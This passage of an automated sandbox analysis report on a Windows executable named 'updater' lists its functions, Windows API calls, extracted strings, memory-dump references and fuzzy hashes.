Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0ef95fc373f6734a1f8b8a41353ee126dcc616ce1f37213efa36a22ac8846486
Instruction ID: 64c9f69827bbd7d763bcc5df0814eb9aa86c9468429fd60357d742ffe7407300
Opcode Fuzzy Hash: 0ef95fc373f6734a1f8b8a41353ee126dcc616ce1f37213efa36a22ac8846486
Instruction Fuzzy Hash: FF71B4342043119FC71AEF64D591A6EB7F0AF99314F04862DF49A8B3A2DB34ED05CB52

Function 016D0649 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 016D06E2

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 309f0a8092519add84b43a481f58ba2d0d4a81795aa46c64d4cd072c0d6cbe56
Instruction ID: 39b39512aea67dda0a72faafe469f363d4ed9085288f472b9fa0fdfb896ef9fc
Opcode Fuzzy Hash: 309f0a8092519add84b43a481f58ba2d0d4a81795aa46c64d4cd072c0d6cbe56
Instruction Fuzzy Hash: 1E21CDB4A052869FC750CF2CC880A5ABBF5FF88350F248929F999CB344E331E9548B52

Function 016D0581 Relevance: 1.3, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 016D05FA

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8e643b96241e6bfd84956d9cc9ce41f17e02f6fc5d44d6d4fe0b436771e7158c
Instruction ID: ba69a02f6d0194e6cd0fd0e018eaf5c948e2fb6c90f4588fb29efd413b55d78e
Opcode Fuzzy Hash: 8e643b96241e6bfd84956d9cc9ce41f17e02f6fc5d44d6d4fe0b436771e7158c
Instruction Fuzzy Hash: 9A219F74A053069FC320DF19D884A0ABBE1EB98360F64895DF5D8C7354E732E950CB56

Function 016D0709 Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 016D0799

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ed0c1770e42dd1cd483697f4c157d13bc91e0bccdb12ebf04c9fc5034ae8aebe
Instruction ID: f68f6be42729cd4c5dc5a9b6ac52bd66f8a482b808fb7f1afc27cecc3635a394
Opcode Fuzzy Hash: ed0c1770e42dd1cd483697f4c157d13bc91e0bccdb12ebf04c9fc5034ae8aebe
Instruction Fuzzy Hash: 4D21DDB4605202DFC750CF2CD884A6AB7E1FF89350F254968F598CB344E331E9188F92

Function 016E8E85 Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 016E8DF1: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E36
Part of subcall function 016E8DF1: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E4E
Part of subcall function 016E8DF1: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E5A

Sleep.KERNEL32(00000002,00000000,016E8EF6), ref: 016E8ED6

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleSleepWrite
String ID:
API String ID: 1443029356-0
Opcode ID: acec12d6b0f9d993cec632fca7d2ab3ba1570d212499aebe4d55238b4023b2b1
Instruction ID: 95d3190593207f0618be48a5e5fd4e3763f82b4ec4f976cbc8fceefee0960e41
Opcode Fuzzy Hash: acec12d6b0f9d993cec632fca7d2ab3ba1570d212499aebe4d55238b4023b2b1
Instruction Fuzzy Hash: 33F08170E04609AFDB11EBA9CD45A9EBBF9EB64300F6101B9A404D3790DF305E00D619

Function 016E8EFC Relevance: 1.3, APIs: 1, Instructions: 38sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 016E8DF1: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E36
Part of subcall function 016E8DF1: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E4E
Part of subcall function 016E8DF1: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E5A

Sleep.KERNEL32(00000002,00000000,016E8EF6), ref: 016E8ED6

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleSleepWrite
String ID:
API String ID: 1443029356-0
Opcode ID: 579646048a9d03fb63dc7f9494208b44d3c593752672c6f5dda40f6a034b5e90
Instruction ID: e03209d003076c79a710b963aee5b2f9da14170e9e3852644c996a9ee76f09aa
Opcode Fuzzy Hash: 579646048a9d03fb63dc7f9494208b44d3c593752672c6f5dda40f6a034b5e90
Instruction Fuzzy Hash: BDF0AF70E04209EFDB11EBA9CD55AAEBBF9EB68300F6104B9E404E3750DF315E01DA14

Function 016F6F51 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16f5000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction ID: 6677043e3cd4740b0346d29af4a0f995cb0d173a8b119c467c3ba3c1e6e76c53
Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction Fuzzy Hash: CB3139A9104A02FAEB214A6CCC10BA3BB5ABF07224F10031DE791837C1D731A685C3B5

Non-executed Functions

Function 0039D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0039D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0039D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039D2B8
SendMessageW.USER32 ref: 0039D2E1
_wcsncpy.LIBCMT ref: 0039D359
GetKeyState.USER32(00000011), ref: 0039D37A
GetKeyState.USER32(00000009), ref: 0039D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039D39D
GetKeyState.USER32(00000010), ref: 0039D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039D3D0
SendMessageW.USER32 ref: 0039D3F7
SendMessageW.USER32(?,00001030,?,0039B9BA), ref: 0039D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0039D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0039D526
SetCapture.USER32(?), ref: 0039D52F
ClientToScreen.USER32(?,?), ref: 0039D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0039D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0039D5BB
ReleaseCapture.USER32 ref: 0039D5C6
GetCursorPos.USER32(?), ref: 0039D600
ScreenToClient.USER32(?,?), ref: 0039D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 0039D669
SendMessageW.USER32 ref: 0039D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D6D4
SendMessageW.USER32 ref: 0039D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0039D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0039D733
GetCursorPos.USER32(?), ref: 0039D753
ScreenToClient.USER32(?,?), ref: 0039D760
GetParent.USER32(?), ref: 0039D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 0039D7E9
SendMessageW.USER32 ref: 0039D81A
ClientToScreen.USER32(?,?), ref: 0039D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0039D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D8D2
SendMessageW.USER32 ref: 0039D8F5
ClientToScreen.USER32(?,?), ref: 0039D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0039D97B

Part of subcall function 003129AB: GetWindowLongW.USER32(?,000000EB), ref: 003129BC

GetWindowLongW.USER32(?,000000F0), ref: 0039DA17

Strings

@GUI_DRAGID, xrefs: 0039D562
F, xrefs: 0039D8FB

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 99912c9775d538c1ebfd020ee302b2fd727b99dbe891f3cce00e61b431e8db27
Instruction ID: c60ffedbb74419fec7e4189b1189077f4aaa976245a485309ca21d2aa6c15aef
Opcode Fuzzy Hash: 99912c9775d538c1ebfd020ee302b2fd727b99dbe891f3cce00e61b431e8db27
Instruction Fuzzy Hash: EC42D135208341AFCB26DF28C885FAABBE9FF4A310F15061DF6958B2A1D771D854CB52

Function 00398400 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00398AF5

Strings

%d/%02d/%02d, xrefs: 0039882E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: c9f1a3ede06b4d0904378a7d25607d29b13866390e76ea21058a9ef7b8a6edff
Instruction ID: 4b2f433fa76b17ade208f19aa37472eb076c8c2038029465635008f9244513b6
Opcode Fuzzy Hash: c9f1a3ede06b4d0904378a7d25607d29b13866390e76ea21058a9ef7b8a6edff
Instruction Fuzzy Hash: 3E12B171504214AFEF2A9F28CC89FAE7BB8EF86310F15411AF915EA2E1DF748945CB10

Function 00368F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00369399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003693E3
Part of subcall function 00369399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00369410
Part of subcall function 00369399: GetLastError.KERNEL32 ref: 0036941D

_memset.LIBCMT ref: 00368F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00368FC3
CloseHandle.KERNEL32(?), ref: 00368FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00368FEB
GetProcessWindowStation.USER32 ref: 00369004
SetProcessWindowStation.USER32(00000000), ref: 0036900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00369028

Part of subcall function 00368DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368F27), ref: 00368DFE
Part of subcall function 00368DE9: CloseHandle.KERNEL32(?,?,00368F27), ref: 00368E10

Strings

winsta0, xrefs: 00368FE6
default, xrefs: 00369023
, xrefs: 00368F80

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 0c46f07ba53b86ea216436773e321d1fab24f78e9c217f241542dc33eeecea71
Instruction ID: 1d373dec5a29873f739fecbc7dfc42f2ea850931d407aefba89097f0b23c707e
Opcode Fuzzy Hash: 0c46f07ba53b86ea216436773e321d1fab24f78e9c217f241542dc33eeecea71
Instruction Fuzzy Hash: 66817BB1900209BFDF129FA4CC49AFE7B7DEF0A304F15815AF910A6264DB328E15DB20

Function 00384632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(003A0980), ref: 0038465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 0038466A
GetClipboardData.USER32(0000000D), ref: 00384672
CloseClipboard.USER32 ref: 0038467E
GlobalLock.KERNEL32(00000000), ref: 0038469A
CloseClipboard.USER32 ref: 003846A4
GlobalUnlock.KERNEL32(00000000), ref: 003846B9
IsClipboardFormatAvailable.USER32(00000001), ref: 003846C6
GetClipboardData.USER32(00000001), ref: 003846CE
GlobalLock.KERNEL32(00000000), ref: 003846DB
GlobalUnlock.KERNEL32(00000000), ref: 0038470F
CloseClipboard.USER32 ref: 0038481F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 1be524ac06d22dcefa3b0209dfff9d25474565bdd99749d68d3b1e30ae7b7f1f
Instruction ID: 8adcf00384dd7e5b4133441660d544383abadc638174534a04e68cba247ee745
Opcode Fuzzy Hash: 1be524ac06d22dcefa3b0209dfff9d25474565bdd99749d68d3b1e30ae7b7f1f
Instruction Fuzzy Hash: 7851AD31244302ABD307FF60EC89F6E77ACAF99B50F014529F656D61A1EF30D9058B62

Function 0037F5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 0037F5F9
_wcscmp.LIBCMT ref: 0037F60E
_wcscmp.LIBCMT ref: 0037F625
GetFileAttributesW.KERNEL32(?), ref: 0037F637
SetFileAttributesW.KERNEL32(?,?), ref: 0037F651
FindNextFileW.KERNEL32(00000000,?), ref: 0037F669
FindClose.KERNEL32(00000000), ref: 0037F674
FindFirstFileW.KERNEL32(*.*,?), ref: 0037F690
_wcscmp.LIBCMT ref: 0037F6B7
_wcscmp.LIBCMT ref: 0037F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 0037F6E0
SetCurrentDirectoryW.KERNEL32(003CB578), ref: 0037F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F708
FindClose.KERNEL32(00000000), ref: 0037F715
FindClose.KERNEL32(00000000), ref: 0037F727

Strings

S7, xrefs: 0037F6E2
*.*, xrefs: 0037F68B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$S7
API String ID: 1803514871-1017210279
Opcode ID: 1da77f104244678b2f13ff5afdc5cd4bcb1a80bf59c4b51fe78d27c35613e365
Instruction ID: 20086ab3153396d377f86b3b8159cc4e7c0769b405aab0958a0ccc1bf0da61d9
Opcode Fuzzy Hash: 1da77f104244678b2f13ff5afdc5cd4bcb1a80bf59c4b51fe78d27c35613e365
Instruction Fuzzy Hash: D33196716412196FDB269FB4DC89EEE77ACAF4A361F118165F808E21A0DB34DE44CB60

Function 0037CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0037CDD0
FindClose.KERNEL32(00000000), ref: 0037CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CE87
__swprintf.LIBCMT ref: 0037CED3
__swprintf.LIBCMT ref: 0037CF16

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

__swprintf.LIBCMT ref: 0037CF6A

Part of subcall function 003338C8: __woutput_l.LIBCMT ref: 00333921

__swprintf.LIBCMT ref: 0037CFB8

Part of subcall function 003338C8: __flsbuf.LIBCMT ref: 00333943
Part of subcall function 003338C8: __flsbuf.LIBCMT ref: 0033395B

__swprintf.LIBCMT ref: 0037D007
__swprintf.LIBCMT ref: 0037D056
__swprintf.LIBCMT ref: 0037D0A5

Strings

%02d, xrefs: 0037CF5E, 0037CF68, 0037CFB6, 0037D005, 0037D054, 0037D0A3
%4d, xrefs: 0037CF10
%4d%02d%02d%02d%02d%02d, xrefs: 0037CECD

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: eb60599136980ab5e59d78ad40bcc4b7fb7f899a3cf95cc1de490d6def3223fa
Instruction ID: 1cdd61970c01ca4620a5fda10341f2b8af208b6c5f3001cb9e4684fa8cc27d27
Opcode Fuzzy Hash: eb60599136980ab5e59d78ad40bcc4b7fb7f899a3cf95cc1de490d6def3223fa
Instruction Fuzzy Hash: 48A16EB1404304ABC716EFA4D985DAFB7ECAF99701F40491DF595CB191EB30DA48CBA2

Function 00390EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00390FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,003A0980,00000000,?,00000000,?,?), ref: 00391021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00391069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003910F2
RegCloseKey.ADVAPI32(?), ref: 00391412
RegCloseKey.ADVAPI32(00000000), ref: 0039141F

Strings

REG_DWORD, xrefs: 003912E3
REG_EXPAND_SZ, xrefs: 0039108F
REG_BINARY, xrefs: 003913AD
REG_MULTI_SZ, xrefs: 003911DA
REG_SZ, xrefs: 00391130
REG_QWORD, xrefs: 00391360

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: f74178d525721be67aadc2abb42a376d5a98e616e89ddbe10f410ab7f01c2fb6
Instruction ID: 40bc887510e4ae3ffd6061a9a2382c1c4bcd21ade28b96da1cecabeeb243b477
Opcode Fuzzy Hash: f74178d525721be67aadc2abb42a376d5a98e616e89ddbe10f410ab7f01c2fb6
Instruction Fuzzy Hash: C3026A752006119FCB1AEF25D881E6AB7E5FF89710F05895CF88A9B362DB30ED41CB91

Function 0037F735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 0037F756
_wcscmp.LIBCMT ref: 0037F76B
_wcscmp.LIBCMT ref: 0037F782

Part of subcall function 00374875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00374890

FindNextFileW.KERNEL32(00000000,?), ref: 0037F7B1
FindClose.KERNEL32(00000000), ref: 0037F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 0037F7D8
_wcscmp.LIBCMT ref: 0037F7FF
_wcscmp.LIBCMT ref: 0037F816
SetCurrentDirectoryW.KERNEL32(?), ref: 0037F828
SetCurrentDirectoryW.KERNEL32(003CB578), ref: 0037F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F850
FindClose.KERNEL32(00000000), ref: 0037F85D
FindClose.KERNEL32(00000000), ref: 0037F86F

Strings

*.*, xrefs: 0037F7D3
j7, xrefs: 0037F82A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$j7
API String ID: 1824444939-2425405264
Opcode ID: 8a198a82d79f3e9739babe65153616f012124091743eff0fe65737974f91e881
Instruction ID: 779aefea342239cd9fcbe03c46c38058d4422a1a6ad724da7bcb5bd9ffd08314
Opcode Fuzzy Hash: 8a198a82d79f3e9739babe65153616f012124091743eff0fe65737974f91e881
Instruction Fuzzy Hash: 2931E5715002597EDB269FB4DC89AEE77ACAF0A321F118165F808E21A1DB34CE45CB61

Function 016D41E5 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 016D4202
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 016D4213
lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 016D4247
lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 016D42B8
lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 016D42F3
FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 016D4306
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 016D4313
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 016D431F
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 016D4353
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 016D435F
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 016D4388

Strings

kernel32.dll, xrefs: 016D41FD
\, xrefs: 016D4331
GetLongPathNameA, xrefs: 016D420D

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 97651d2b511e10ef05573f8d47a05653fea369d8eac235fe7e2ca292b0a8f448
Instruction ID: 6c65094ee6f99979f74e4deec9667714ad970c7e8167f832765fbb9911b1dc87
Opcode Fuzzy Hash: 97651d2b511e10ef05573f8d47a05653fea369d8eac235fe7e2ca292b0a8f448
Instruction Fuzzy Hash: C0512672E00259EFDB11DFEDCC89AEEB7BDAF48205F0405A6E555E7240DB709E408BA4

Function 0032D45D Relevance: 24.6, Strings: 19, Instructions: 883COMMON

Download Yara Rule

Strings

UTF), xrefs: 00361A8B
ANYCRLF), xrefs: 00361C8C
CR), xrefs: 00361C18
UCP), xrefs: 00361A9E
BSR_ANYCRLF), xrefs: 00361CAF
W;, xrefs: 0032D4B9
NO_AUTO_POSSESS), xrefs: 00361ABF
CRLF), xrefs: 00361C52
Z;, xrefs: 0032D4CD
BSR_UNICODE), xrefs: 00361CC9
V;, xrefs: 0032D4AF
LIMIT_MATCH=, xrefs: 00361B01
NO_START_OPT), xrefs: 00361AE0
LIMIT_RECURSION=, xrefs: 00361B8D
#V2, xrefs: 00361DE0, 00361E87, 00361F35
